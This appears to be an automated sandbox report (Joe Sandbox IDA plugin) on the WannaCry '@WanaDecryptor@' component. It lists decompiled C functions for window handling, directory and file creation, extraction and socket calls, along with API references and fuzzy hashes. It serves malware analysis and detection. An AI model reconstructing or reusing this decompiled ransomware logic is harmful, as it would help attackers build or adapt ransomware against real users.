                                  											E0040CE50(_t147, 0);
                                  											_push(_t250);
                                  											L00412C98();
                                  											_t257 = _t260 + 4;
                                  											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
                                  											Sleep(0xbb8); // executed
                                  											_t86 =  *(_t257 + 0x1c);
                                  											__eflags = _t86;
                                  										} while (_t86 > 0);
                                  										goto L30;
                                  									}
                                  								} else {
                                  									goto L17;
                                  								}
                                  								goto L32;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							goto L16;
                                  						}
                                  					} else {
                                  						_push(0x422214);
                                  						_t72 = E0040BA60(_t266);
                                  						_t252 = _t252 + 4;
                                  						if(_t72 != 0) {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				L32:
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
                                  				return _t72;
                                  			}

                                  0x0040bd1c
                                  0x0040bd1e
                                  0x0040bd1e
                                  0x0040bd20
                                  0x0040bd20
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd23
                                  0x0040bd20
                                  0x0040bd26
                                  0x0040bd28
                                  0x0040bd2a
                                  0x0040bd2c
                                  0x0040bd2c
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2f
                                  0x0040bd2c
                                  0x0040bd32
                                  0x0040bd35
                                  0x0040bd35
                                  0x0040bd38
                                  0x0040bd3a
                                  0x0040bd3c
                                  0x0040bd3c
                                  0x0040bd4c
                                  0x0040bd4e
                                  0x0040bd54
                                  0x0040bd58
                                  0x0040bd62
                                  0x0040bd62
                                  0x0040bd64
                                  0x0040bd68
                                  0x0040bd69
                                  0x0040bd6e
                                  0x0040bd71
                                  0x0040bd73
                                  0x0040be1a
                                  0x0040be25
                                  0x0040be27
                                  0x0040be2d
                                  0x0040be34
                                  0x0040be37
                                  0x0040be3e
                                  0x0040be3e
                                  0x0040be40
                                  0x0040be44
                                  0x0040be46
                                  0x0040be48
                                  0x0040be4c
                                  0x0040be4e
                                  0x0040be52
                                  0x0040be6a
                                  0x0040be6f
                                  0x0040be6f
                                  0x0040be4e
                                  0x0040be79
                                  0x0040be7a
                                  0x0040be7f
                                  0x0040be82
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bd79
                                  0x0040bd79
                                  0x0040bd81
                                  0x0040bd8c
                                  0x0040bd94
                                  0x0040bd96
                                  0x0040bd99
                                  0x0040bd9e
                                  0x0040bd9f
                                  0x0040bda8
                                  0x0040bdb1
                                  0x0040bdb5
                                  0x0040bdbb
                                  0x0040bdbf
                                  0x0040bdbf
                                  0x00000000
                                  0x0040bd07
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bc7c
                                  0x0040bc75
                                  0x0040bc77
                                  0x00000000
                                  0x0040bc77
                                  0x0040bb38
                                  0x0040bb38
                                  0x0040bb3d
                                  0x0040bb42
                                  0x0040bb47
                                  0x00000000
                                  0x00000000
                                  0x0040bb47
                                  0x0040bb36
                                  0x0040bdf8
                                  0x0040be03
                                  0x0040be10

                                  APIs
                                  • strtok.MSVCRT ref: 0040BBA9
                                  • strtok.MSVCRT ref: 0040BC22
                                  • #825.MFC42(?,?), ref: 0040BCDD
                                  • GetTickCount.KERNEL32 ref: 0040BCEC
                                  • srand.MSVCRT ref: 0040BCF3
                                  • rand.MSVCRT ref: 0040BD09
                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                  • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                  • #825.MFC42(?,?,?,?), ref: 0040BDED
                                    • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                  • #825.MFC42(?), ref: 0040BE7A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$strtok$CountSleepTickrandsrand
                                  • String ID:
                                  • API String ID: 1749417438-0
                                  • Opcode ID: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                  • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                  • Opcode Fuzzy Hash: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                  • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 504 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 505 408660-4086a6 #6140 504->505 506 408654-408658 504->506 506->505 507 40865a-40865e GetSysColor 506->507 507->505
                                  C-Code - Quality: 83%
                                  			E004085C0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				void _v24;
                                  				intOrPtr _v28;
                                  				int _t33;
                                  				intOrPtr _t50;
                                  				long _t53;
                                  				intOrPtr _t55;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413FF3);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t55;
                                  				_t50 = __ecx;
                                  				_v16 = __ecx;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx)) = 0x4157f0;
                                  				_v4 = 0;
                                  				L00412F74();
                                  				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x78)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x80)) = 0;
                                  				_v4 = 1;
                                  				 *((intOrPtr*)(__ecx)) = 0x4161a4;
                                  				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
                                  				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
                                  				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
                                  				_t53 = GetSysColor(2);
                                  				_v20 = _t53;
                                  				_v24 = 0;
                                  				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
                                  				if(_t33 != 0 && _v24 != 0) {
                                  					_t53 = GetSysColor(0x1b);
                                  				}
                                  				_push(0xffffffff);
                                  				_push(2);
                                  				L00412F50();
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
                                  				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
                                  				 *((intOrPtr*)(_t50 + 0x68)) = 0;
                                  				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
                                  				 *((intOrPtr*)(_t50 + 0x54)) = 0;
                                  				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
                                  				 *[fs:0x0] = _v20;
                                  				return _t50;
                                  			}













                                  APIs
                                  • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                  • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                  • GetSysColor.USER32 ref: 0040861D
                                  • GetSysColor.USER32(00000009), ref: 00408624
                                  • GetSysColor.USER32(00000012), ref: 0040862B
                                  • GetSysColor.USER32(00000002), ref: 00408632
                                  • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                  • GetSysColor.USER32(0000001B), ref: 0040865C
                                  • #6140.MFC42(00000002,000000FF), ref: 00408667
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Color$#341#567#6140CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2603677082-0
                                  • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                  • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
                                  				struct HWND__* _t4;
                                  				struct HWND__* _t15;
                                  
                                  				_t4 = FindWindowW(0, _a4); // executed
                                  				_t15 = _t4;
                                  				if(_t15 != 0) {
                                  					ShowWindow(_t15, 5);
                                  					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
                                  					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                  					SetForegroundWindow(_t15);
                                  					SetFocus(_t15);
                                  					SetActiveWindow(_t15);
                                  					BringWindowToTop(_t15);
                                  					_t4 = _a8;
                                  					if(_t4 != 0) {
                                  						ExitProcess(0);
                                  					}
                                  				}
                                  				return _t4;
                                  			}






                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                  • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                  • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                  • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                  • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                  • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                  • BringWindowToTop.USER32(00000000), ref: 0040B678
                                  • ExitProcess.KERNEL32 ref: 0040B689
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID:
                                  • API String ID: 962039509-0
                                  • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                  • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fclose$fopenfreadfwrite
                                  • String ID: c.wnry
                                  • API String ID: 2140422903-3240288721
                                  • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                  • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
                                  				char _v520;
                                  				void _v816;
                                  				struct _SECURITY_ATTRIBUTES* _v820;
                                  				void* _t15;
                                  				struct _SECURITY_ATTRIBUTES* _t37;
                                  				CHAR* _t38;
                                  				void* _t39;
                                  				CHAR* _t40;
                                  				struct _SECURITY_ATTRIBUTES** _t42;
                                  				struct _SECURITY_ATTRIBUTES** _t44;
                                  
                                  				_t40 = _a4;
                                  				CreateDirectoryA(_t40, 0); // executed
                                  				_t38 = _a8;
                                  				_t15 = E00412920(_t38, _a12);
                                  				_t28 = _t15;
                                  				_t42 =  &(( &_v820)[2]);
                                  				if(_t15 != 0) {
                                  					_v820 = 0;
                                  					memset( &_v816, 0, 0x4a << 2);
                                  					E00412940(_t28, 0xffffffff,  &_v820);
                                  					_t37 = _v820;
                                  					_t44 =  &(_t42[6]);
                                  					if(_t37 > 0) {
                                  						_t39 = 0;
                                  						if(_t37 > 0) {
                                  							do {
                                  								E00412940(_t28, _t39,  &_v820);
                                  								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
                                  								E004129E0(_t28, _t39,  &_v520);
                                  								_t44 =  &(_t44[0xa]);
                                  								_t39 = _t39 + 1;
                                  							} while (_t39 < _t37);
                                  						}
                                  						E00412A00(_t28);
                                  						return 1;
                                  					} else {
                                  						return 0;
                                  					}
                                  				} else {
                                  					DeleteFileA(_t38);
                                  					return 0;
                                  				}
                                  			}














                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                  • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDeleteDirectoryFile
                                  • String ID: %s\%s
                                  • API String ID: 3195586388-4073750446
                                  • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                  • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
                                  				long _t28;
                                  				long _t30;
                                  				void* _t34;
                                  				signed int _t38;
                                  				void* _t44;
                                  				long* _t45;
                                  				long _t46;
                                  				char _t47;
                                  
                                  				_t47 = _a12;
                                  				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
                                  					_t45 = _a16;
                                  					_t44 = 0;
                                  					_t38 = 0;
                                  					 *_t45 = 0;
                                  					_a12 = 0;
                                  					if(_t47 == 1) {
                                  						_t44 = _a4;
                                  						_a12 = 0;
                                  						goto L10;
                                  					} else {
                                  						if(_t47 != 2) {
                                  							L11:
                                  							_push(0x20);
                                  							L00412CEC();
                                  							_t46 = _t28;
                                  							if(_t47 == 1 || _t47 == 2) {
                                  								 *_t46 = 1;
                                  								 *((char*)(_t46 + 0x10)) = _a12;
                                  								 *(_t46 + 1) = _t38;
                                  								 *(_t46 + 4) = _t44;
                                  								 *((char*)(_t46 + 8)) = 0;
                                  								 *(_t46 + 0xc) = 0;
                                  								if(_t38 != 0) {
                                  									_t30 = SetFilePointer(_t44, 0, 0, 1); // executed
                                  									 *(_t46 + 0xc) = _t30;
                                  								}
                                  								 *_a16 = 0;
                                  								return _t46;
                                  							} else {
                                  								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
                                  								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
                                  								 *_t46 = 0;
                                  								 *(_t46 + 1) = 1;
                                  								 *((char*)(_t46 + 0x10)) = 0;
                                  								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                                  								 *(_t46 + 0xc) = 0;
                                  								 *_a16 = 0;
                                  								return _t46;
                                  							}
                                  						} else {
                                  							_t34 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                  							_t44 = _t34;
                                  							if(_t44 != 0xffffffff) {
                                  								_a12 = 1;
                                  								L10:
                                  								_t28 = SetFilePointer(_t44, 0, 0, 1); // executed
                                  								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
                                  								goto L11;
                                  							} else {
                                  								 *_t45 = 0x200;
                                  								return 0;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					 *_a16 = 0x10000;
                                  					return 0;
                                  				}
                                  			}












                                  APIs
                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                  • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Pointer$#823Create
                                  • String ID:
                                  • API String ID: 3407337251-0
                                  • Opcode ID: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                  • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                  • Opcode Fuzzy Hash: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                  • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00412250(CHAR* _a4, void* _a8) {
                                  				void _v260;
                                  				char _v520;
                                  				long _t16;
                                  				void* _t17;
                                  				int _t22;
                                  				void* _t29;
                                  				CHAR* _t32;
                                  				signed int _t33;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				signed int _t39;
                                  				unsigned int _t46;
                                  				signed int _t47;
                                  				signed int _t51;
                                  				signed int _t52;
                                  				void* _t56;
                                  				void* _t83;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t87;
                                  				char* _t88;
                                  				char* _t93;
                                  
                                  				_t88 =  &_v520;
                                  				_t32 = _a4;
                                  				if(_t32 != 0) {
                                  					_t16 = GetFileAttributesA(_t32); // executed
                                  					if(_t16 == 0xffffffff) {
                                  						_t16 = CreateDirectoryA(_t32, 0);
                                  					}
                                  				}
                                  				_t87 = _a8;
                                  				_t34 =  *_t87;
                                  				if(_t34 == 0) {
                                  					L15:
                                  					return _t16;
                                  				} else {
                                  					_t17 = _t87;
                                  					_t56 = _t87;
                                  					do {
                                  						if(_t34 == 0x2f || _t34 == 0x5c) {
                                  							_t17 = _t56;
                                  						}
                                  						_t34 =  *(_t56 + 1);
                                  						_t56 = _t56 + 1;
                                  					} while (_t34 != 0);
                                  					if(_t17 != _t87) {
                                  						_t86 = _t87;
                                  						_t51 = _t17 - _t87;
                                  						_t52 = _t51 >> 2;
                                  						memcpy( &_v260, _t86, _t52 << 2);
                                  						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
                                  						_t93 =  &(_t88[0x18]);
                                  						_t34 = 0;
                                  						_t93[_t29 + 0x114] = 0;
                                  						E00412250(_t32,  &_v260);
                                  						_t88 =  &(_t93[8]);
                                  					}
                                  					_v520 = 0;
                                  					if(_t32 != 0) {
                                  						asm("repne scasb");
                                  						_t46 =  !(_t34 | 0xffffffff);
                                  						_t85 = _t32 - _t46;
                                  						_t47 = _t46 >> 2;
                                  						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
                                  						_t88 =  &(_t88[0x18]);
                                  						_t34 = 0;
                                  					}
                                  					asm("repne scasb");
                                  					_t36 =  !(_t34 | 0xffffffff);
                                  					_t83 = _t87 - _t36;
                                  					_t33 = _t36;
                                  					asm("repne scasb");
                                  					_t39 = _t33 >> 2;
                                  					memcpy( &_v520 - 1, _t83, _t39 << 2);
                                  					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
                                  					_t16 = GetFileAttributesA( &_v520); // executed
                                  					if(_t16 != 0xffffffff) {
                                  						goto L15;
                                  					} else {
                                  						_t22 = CreateDirectoryA( &_v520, 0); // executed
                                  						return _t22;
                                  					}
                                  				}
                                  			}


























                                  APIs
                                  • GetFileAttributesA.KERNELBASE(?,?,?), ref: 00412264
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                  • GetFileAttributesA.KERNELBASE(00000000), ref: 00412338
                                  • CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesCreateDirectoryFile
                                  • String ID:
                                  • API String ID: 3401506121-0
                                  • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                  • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00412A00(intOrPtr* _a4) {
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t14;
                                  				intOrPtr _t16;
                                  				void* _t18;
                                  
                                  				_t14 = _a4;
                                  				if(_t14 != 0) {
                                  					if( *_t14 == 1) {
                                  						_t2 = _t14 + 4; // 0x5d5e5f01
                                  						_t16 =  *_t2;
                                  						 *0x4220dc = E004127A0(_t16);
                                  						if(_t16 != 0) {
                                  							_t9 =  *((intOrPtr*)(_t16 + 0x138));
                                  							if(_t9 != 0) {
                                  								_push(_t9);
                                  								L00412C98();
                                  								_t18 = _t18 + 4;
                                  							}
                                  							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
                                  							 *((intOrPtr*)(_t16 + 0x138)) = 0;
                                  							if(_t10 != 0) {
                                  								_push(_t10); // executed
                                  								L00412C98(); // executed
                                  								_t18 = _t18 + 4;
                                  							}
                                  							_push(_t16);
                                  							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
                                  							L00412C98();
                                  							_t18 = _t18 + 4;
                                  						}
                                  						_push(_t14); // executed
                                  						L00412C98(); // executed
                                  						return  *0x4220dc;
                                  					} else {
                                  						 *0x4220dc = 0x80000;
                                  						return 0x80000;
                                  					}
                                  				} else {
                                  					 *0x4220dc = 0x10000;
                                  					return 0x10000;
                                  				}
                                  			}









                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                  • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                  • Opcode Fuzzy Hash: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                  • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketsendsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 4063721217-0
